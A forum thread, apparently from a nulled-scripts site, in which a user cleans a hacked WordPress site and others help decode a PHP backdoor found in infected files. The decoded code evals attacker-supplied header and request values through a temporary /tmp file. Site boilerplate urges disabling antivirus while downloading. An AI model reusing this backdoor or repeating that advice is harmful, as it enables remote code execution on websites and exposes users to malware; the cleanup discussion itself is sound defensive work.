them how would i have found them in the first place? I even stated that they were off the 80 char screen, on the far right so obviously, i knew they were theredid not sound like you knew that.
You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.
Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"
them how would i have found them in the first place? I even stated that they were off the 80 char screen, on the far right so obviously, i knew they were theredid not sound like you knew that.
Guess you did, i misread thatthem whw would i have found them in the first place? I even stated that they were off the 80 char screen, on the far right so obviously, i knew they were there
No worries... you did try to help and I appreciate your advice but I gotta tell you, I also have a local test environment and it too can get infected. But like I said, no worries, thank you for your helpYou can call BS all you want. I am not the one that got hacked twice.
I run them to try them out, if I like them, than I purchase them to support the authors.
Yes it can, run on a seperate vlan and all traffic blocked except to my ip.No worries... you did try to help and I appreciate your advice but I gotta tell you, I also have a local test environment and it too can get infected. But like I said, no worries, thank you for your help
so can anyone decode this text - it was at the top of a lot of infected files.
I tried to Ctrl-V to insert the text inside a quote tag, but it wouldn't let me so I attached via the attached text file
$c = "@eval($_REQUEST["If-Unmodified-Since\"]);@eval($_HEADERS["If-Unmodified-Since"]);";
$_HEADERS = getallheaders();if(isset($_HEADERS['If-Modified-Since'])){$c="@eval($_REQUEST["Clear-Site-Data"]);@eval($_HEADERS["Clear-Site-Data"]);";$f='/tmp/.'.time();@file_put_contents($f, $c);@include($f);@unlink($f);}
$c = "@eval($_REQUEST["If-
Unmodified-Since\"]);@eval($_H
EADERS["If-Unmodified-Since"]);";
Here is the file decrypted
PHP:$_HEADERS = getallheaders(); if (isset($_HEADERS['X-Dns-Prefetch-Control'])) { $c = "@eval($_REQUEST["If-Unmodified-Since\"]);@eval($_HEADERS["If-Unmodified-Since"]);"; $f = .time(); file_put_contents($f, $c); include($f); unlink($f); }
I use my own cli decoder I wrote, but this one works very well as long as they didn't use anything else to encode it.Would you help me by showing how you decoded that string?
I use my own cli decoder I wrote, but this one works very well as long as they didn't use anything else to encode it.
Online PHP Javascript Script Decoder | Quttera
PHP decoder. Use to decode encrypted malware code.malwaredecoder.com
or you can always search for decode php online for others.
@Sebrof each cron entry is attached to a plugin. You may get a copy of them on your local computer and check one by one.
Redownload all sources from where you got them then compare with the ones on your site.
If all are clear or identical with original downloaded files then get full wordpress folder and compare it with original version of wordpress downloaded from wordpress.org.
Somewhere a file has been edited to include malicious script that is running trough cron.
wordfence is doing a great job of blocking logins - but I have no idea what criteria it is using to do these blocks. I haven't setup any "blocking" criteria. How is it knowing what logins are to be blocked?
WPForm has had quite a few vulnerabilites and could be the culprit. The other one you stated is a lazy loader plugin, not sure why it has all the extra characters in it for I do not use it.will each plugin have it's own folder with it's cron entry?
The plugins on the site, if they are nulled, came from here and are at least one year old. I always balked at updating a nulled script if it seemed to be working fine. Maybe I should redownload the latest and then reinstall. The one that at this point seem sketchy, is WPFORM
You will always have log in attempts since it is wordpress. Wordpress is one of the most attacked cms's there is.Updated wpforms to the latest, now updating the rest of the plugins. Site seems to have calmed down except for a crapload of login attempts, all blocked by Wordfence.
glad you got it all fixed up!i finally got the site 100% clean... wpforms was the main issue... if I had just updated it, any bad files with different names than those in the core would still be there so to be safe, I renamed WPFORMS to kill_wpForms then re-installed a fresh wpforms, then compared the folder and yep, just as I suspected, extra files in the original that would still be there had I just re-installed over the old installation.
Now the scan results look like this: (finally)
Thx for all the help from everyone... what a mess I had - would still be like that without the help of this site - another donation about to be processed
We get it, advertisements are annoying!
However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.
If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.